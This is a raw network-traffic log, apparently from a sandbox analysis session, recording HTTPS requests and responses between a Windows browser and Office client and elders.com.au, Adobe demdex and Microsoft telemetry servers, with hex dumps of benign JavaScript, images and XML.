                                                                                                                                                                                                            2024-11-06 05:29:55 UTC754INData Raw: 65 36 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 67 2c 65 29 7b 65 2e 47 72 61 6e 69 74 65 3d 65 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 3b 65 2e 47 72 61 6e 69 74 65 2e 24 3d 65 2e 47 72 61 6e 69 74 65 2e 24 7c 7c 67 3b 65 2e 5f 67 3d 65 2e 5f 67 7c 7c 7b 7d 3b 65 2e 5f 67 2e 24 3d 65 2e 5f 67 2e 24 7c 7c 67 3b 76 61 72 20 6b 3d 47 72 61 6e 69 74 65 2e 48 54 54 50 3b 67 2e 61 6a 61 78 53 65 74 75 70 28 7b 65 78 74 65 72 6e 61 6c 69 7a 65 3a 21 30 2c 65 6e 63 6f 64 65 50 61 74 68 3a 21 30 2c 68 6f 6f 6b 3a 21 30 2c 62 65 66 6f 72 65 53 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 63 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 47 5f 49 53 5f 48 4f 4f 4b 45 44 26 26 47 5f 49 53 5f 48 4f 4f 4b 45 44 28 63 2e 75 72 6c 29 7c 7c 28 63 2e 65 78
                                                                                                                                                                                                            Data Ascii: e61(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.ex
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 76 61 72 20 62 3d 22 2f 2f 22 2b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 62 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 64 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 64 2b 22 2f 22 7c 7c 61 3d 3d 3d 62 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 62 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 62 2b 22 2f 22 7c 7c 21 2f 5e 28 5c 2f 5c 2f 7c 68 74 74 70 3a 7c 68 74 74 70 73 3a 29 2e 2a 2f 2e 74 65 73 74 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                            Data Ascii: {function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.console
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC1369INData Raw: 73 2e 5f 65 78 65 63 75 74 65 28 22 72 65 6a 65 63 74 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 5f 65 78 65 63 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 63 6f 6d 70 6c 65 74 65 64 2e 22 29 3b 0a 66 6f 72 28 76 61 72 20 64 3d 30 2c 74 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 2e 6c 65 6e 67 74 68 3b 64 3c 74 3b 64 2b 2b 29 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 5b 64 5d 5b 61 5d 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 62 29 3b 74 68 69 73 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 76 29 7b 28 22 72 65 73 6f 6c 76 65 22 3d 3d 3d 61 3f 75 3a 76 29 2e 61 70 70 6c 79 28 77 69 6e 64
                                                                                                                                                                                                            Data Ascii: s._execute("reject",arguments)},_execute:function(a,b){if(null===this._handler)throw Error("Promise already completed.");for(var d=0,t=this._handler.length;d<t;d++)this._handler[d][a].apply(window,b);this.then=function(u,v){("resolve"===a?u:v).apply(wind
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC196INData Raw: 55 6e 61 62 6c 65 20 74 6f 20 61 74 74 61 63 68 20 43 53 52 46 20 74 6f 6b 65 6e 20 74 6f 20 61 6e 20 69 66 72 61 6d 65 20 65 6c 65 6d 65 6e 74 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 6f 72 69 67 69 6e 22 29 7d 72 65 74 75 72 6e 20 61 7d 7d 63 28 29 3b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 28 29 7d 2c 33 45 35 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 73 65 64 3a 21 31 2c 72 65 66 72 65 73 68 54 6f 6b 65 6e 3a 63 2c 5f 63 6c 65 61 72 54 6f 6b 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 3d 76 6f 69 64 20 30 3b 63 28 29 7d 7d 7d 29 3b 0d 0a
                                                                                                                                                                                                            Data Ascii: Unable to attach CSRF token to an iframe element on the same origin")}return a}}c();setInterval(function(){c()},3E5);return{initialised:!1,refreshToken:c,_clearToken:function(){f=void 0;c()}}});
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            144192.168.2.457823172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC738OUTGET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 443
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 08 Feb 2023 05:11:19 GMT
                                                                                                                                                                                                            etag: "0x8DB0992E9D1A95B"
                                                                                                                                                                                                            content-disposition: attachment; filename="icon_farm_supplies.png"; filename*=UTF-8''icon_farm_supplies.png
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940101-LAX
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1721956918.168810,VS0,VS0,VE1195
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aa80c4624-DFW
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC443INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1e 08 06 00 00 00 3b 30 ae a2 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 6d 49 44 41 54 48 89 ed 97 cd 4d c4 30 10 85 1f 88 7b e8 c0 7b c9 31 da 74 00 1d b0 1d 40 09 5b c2 96 40 07 50 02 1d b0 74 b0 28 c7 5c 36 1d 2c 15 04 8d 34 2b 45 de 79 8e 3d 90 0b e2 49 51 94 f8 e7 b3 c7 33 63 fb 6a 1c 47 78 d4 85 ba 95 66 cd d0 1f 3c ed 29 b8 0b f5 2d 80 1d 80 56 7f ed 01 1c f4 7b 0b a0 d2 ff 83 d6 3b 01 b8 9f d4 7f 6b 86 fe 99 81 6f 66 06 f6 34 01 dc 91 3a 01 c0 0b 29 a3 e0 6b 56 d0 0c bd cc 60 33 33 30 a6 2f 1d 34 15 05 ab 36 da 49 a9 ce 66 77 83 db 89 a9 4b 14 26 6b ed 02 ef 1c 50 a8 95 92 6d 97 02 57 ea f9 54 a9 70 92 35 7a 77 82 a1 b3 5e a9 93 5e 28 35 e3 a4 57 66
                                                                                                                                                                                                            Data Ascii: PNGIHDR;0pHYs~mIDATHM0{{1t@[@Pt(\6,4+Ey=IQ3cjGxf<)-V{;kof4:)kV`330/46IfwK&kPmWTp5zw^^(5Wf


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            145192.168.2.45781013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:54 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                            x-ms-request-id: 8b11e52e-a01e-000d-655f-2ed1ea000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052955Z-15869dbbcc6xpvqthC1DFW7ehg00000002y0000000006yxk
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            146192.168.2.45782252.211.141.2184432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC519OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730870990712 HTTP/1.1
                                                                                                                                                                                                            Host: dpm.demdex.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: demdex=06707212550236574584203622074167040076
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:55 GMT
                                                                                                                                                                                                            Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                            Content-Length: 370
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-TID: oZEO8jDtSWo=
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                            P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                            DCS: dcs-prod-irl1-2-v068-09e1288f9.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                            set-cookie: demdex=06707212550236574584203622074167040076; Max-Age=15552000; Expires=Mon, 05 May 2025 05:29:55 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC370INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 30 31 38 37 38 33 39 32 32 31 38 32 33 34 31 34 31 31 31 33 35 36 37 39 36 33 32 34 32 38 31 39 30 34 35 30 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                            Data Ascii: {"d_mid":"01878392218234141113567963242819045089","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            147192.168.2.457829162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:55 UTC977OUTGET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC730INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:57 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 292817
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Mon, 02 Sep 2024 07:18:07 GMT
                                                                                                                                                                                                            etag: "0x8DCCB1F6482CE1F"
                                                                                                                                                                                                            content-disposition: attachment; filename="close_up_ram_head_horns.png"; filename*=UTF-8''close_up_ram_head_horns.png
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210103-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1725838988.415905,VS0,VS0,VE1443
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b04aabab475b-DFW
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 58 00 00 01 90 08 06 00 00 00 72 35 1e 98 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 05 22 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 27 27 0a 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 27 68 74 74
                                                                                                                                                                                                            Data Ascii: PNGIHDRXr5pHYs+"iTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x='adobe:ns:meta/'> <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Description rdf:about='' xmlns:dc='htt
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 72 64 66 3a 6c 69 20 72 64 66 3a 70 61 72 73 65 54 79 70 65 3d 27 52 65 73 6f 75 72 63 65 27 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 43 72 65 61 74 65 64 3e 32 30 32 34 2d 30 39 2d 30 32 3c 2f 41 74 74 72 69 62 3a 43 72 65 61 74 65 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 45 78 74 49 64 3e 63 36 62 37 66 34 34 38 2d 33 34 30 63 2d 34 66 36 35 2d 62 33 35 66 2d 38 33 62 62 65 35 61 39 37 38 62 37 3c 2f 41 74 74 72 69 62 3a 45 78 74 49 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 46 62 49 64 3e 35 32 35 32 36 35 39 31 34 31 37 39 35 38 30 3c 2f 41 74 74 72 69 62 3a 46 62 49 64 3e 0a 20 20 20 20 20 20 20 20 3c 41 74 74 72 69 62 3a 54 6f 75 63 68 54 79 70 65 3e 32 3c 2f 41 74 74 72 69 62 3a
                                                                                                                                                                                                            Data Ascii: <rdf:li rdf:parseType='Resource'> <Attrib:Created>2024-09-02</Attrib:Created> <Attrib:ExtId>c6b7f448-340c-4f65-b35f-83bbe5a978b7</Attrib:ExtId> <Attrib:FbId>525265914179580</Attrib:FbId> <Attrib:TouchType>2</Attrib:
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c 27 86 13 2c 87 c3 e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c 27 86 13 2c 87 c3 e1 70 38 1c 8e 13 c3 09 96 c3 e1 70 38 1c 0e c7 89 e1 04 cb e1 70 38 1c 0e 87 e3 c4 70 82 e5 70 38 1c 0e 87 c3 71 62 38 c1 72 38 1c 0e 87 c3 e1 38 31 9c 60 39 1c 0e 87 c3 e1 70 9c 18 4e b0 1c 0e 87 c3 e1 70 38 4e 0c 27 58 0e 87 c3 e1 70 38 1c
                                                                                                                                                                                                            Data Ascii: p8p8p8pp8qb8r881`9pNp8N'Xp8',p8p8p8pp8qb8r881`9pNp8N'Xp8',p8p8p8pp8qb8r881`9pNp8N'Xp8
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: b2 08 80 2b 42 65 70 2d c8 79 07 ce 19 35 17 70 e5 36 e9 4a 2d 07 e7 d9 26 b5 92 1b 8a 01 b5 56 3b 71 04 9b a4 66 90 48 ae 1b 24 03 34 28 c1 61 a0 4d 7e 5b c4 9a ad 01 50 39 c3 0c 32 19 29 ad 15 a5 14 94 c2 28 a5 60 cd 19 a5 56 94 0a f9 ae 7f 3b 2f 1b 4c cb 16 d3 72 86 10 27 50 8a a0 10 11 e3 04 4a 33 68 9a e4 75 0a 88 29 c9 c2 13 23 88 02 42 48 80 9e 17 b1 9c fb cb 97 2f f1 f4 e9 fb f8 d2 97 bf 82 2f 7e e9 cb b8 7e 75 03 2e 15 65 cd 58 4b 16 23 93 0b 4a 2e c8 b5 34 23 b4 e6 8a 7d ce d8 af 7b 70 c1 c1 3d 3c 46 e0 3a ae 67 72 3b 6d 81 85 18 27 d2 85 80 58 17 dd e1 7d 01 62 b8 00 86 7e 03 e9 cf 61 38 96 2d 16 ba 84 b6 c5 a0 12 21 02 88 44 b8 bc 3c c3 ef 78 f4 10 df f8 f1 8f e3 d1 47 3f 86 ed d5 7d a4 cd 06 f3 76 83 b0 59 30 6d ce 91 b6 5b 84 98 10 e7 19 cb
                                                                                                                                                                                                            Data Ascii: +Bep-y5p6J-&V;qfH$4(aM~[P92)(`V;/Lr'PJ3hu)#BH//~~u.eXK#J.4#}{p=<F:gr;m'X}b~a8-!D<xG?}vY0m[
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: e3 c7 67 d4 6c 2f 80 88 a8 b6 b3 aa da 24 51 00 99 4f 40 2e b5 a9 f2 a6 b4 d9 b9 12 b1 cc d2 36 a6 19 31 98 73 1b 07 e5 35 82 6c cc 26 71 d8 42 48 8d 44 da 7c 24 10 38 c9 f3 8a 35 23 86 d8 14 c3 35 57 d4 52 00 ae 58 0b 70 bb ee b1 dd 67 dc ee 2b d6 cc 58 73 41 1e 14 d1 52 bb 41 a4 d7 a8 ee dd 18 1d 04 7b 56 eb ba e2 a7 7f f2 27 f0 b3 3f f5 13 f8 b3 7f fa 3f c3 37 7f cb 37 e3 db fe a5 7f 05 7f e0 9f fb 36 2c 9b cd 6f 7a cc af 05 be 6e 08 56 2d 05 ff eb ff f8 03 f8 73 ff cd 9f c1 db 5f f9 b2 30 70 8c 46 00 ba 2e 13 6a 15 92 65 83 ea 60 72 0c e4 6a 50 c7 db 8f 01 84 18 64 e2 c7 18 55 a1 a2 36 e0 28 58 70 88 24 04 40 40 8a 01 29 12 96 79 c6 b2 2c 58 96 05 d3 48 ae e6 19 69 59 10 a7 59 c8 45 0c 60 0a 20 ae 20 aa 00 08 b5 64 21 5b d0 b5 cc 48 53 ed 1e a9 4c ba
                                                                                                                                                                                                            Data Ascii: gl/$QO@.61s5l&qBHD|$85#5WRXpg+XsARA{V'??776,oznV-s_0pF.je`rjPdU6(Xp$@@)y,XHiYYE` d![HSL
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: c5 c1 98 60 0d f1 ae 2b d6 fd 8a dd 6e 27 b9 7d fc fa f8 79 cd b9 1e ce d7 14 be fe 1c 30 3c 63 71 96 8c 94 12 4b 16 a2 1c 6f 6d ce 06 2a 77 d2 c3 9d 74 85 10 10 93 a8 ca a5 64 30 17 25 c6 a6 9a 89 4b 10 62 6a a4 af 9f 57 6d 8e b4 29 93 76 fe a3 92 c7 44 98 52 42 ad 45 d4 a5 10 00 62 cd 13 94 5b 57 ed b3 54 75 b7 73 8d d0 73 d4 bc c1 29 45 cc 49 1c 02 a2 fe 5e 21 5d 51 c9 d5 84 18 27 04 55 b1 d8 e6 11 e4 3b 5b ec b1 32 42 a8 ea d4 c9 33 9d ab 86 3a d7 3d ce b6 0b 6e 76 3b ec f6 13 6e 6e 57 2c 53 c1 ed 1a 91 4a 44 29 a2 40 56 1e 95 d1 41 05 f9 2d a0 91 cc 46 ae e5 7f 42 24 45 10 79 f9 ec 31 fe fb 3f fb bd f8 eb 3f fc bf e1 8f fe f1 3f 89 6f f9 c7 bf f5 b7 7c fc 53 e3 b7 95 60 31 33 fe a7 ff e1 fb f1 bd ff e9 77 21 af fb 03 26 7e fc 3e f9 01 c7 74 bd fd de
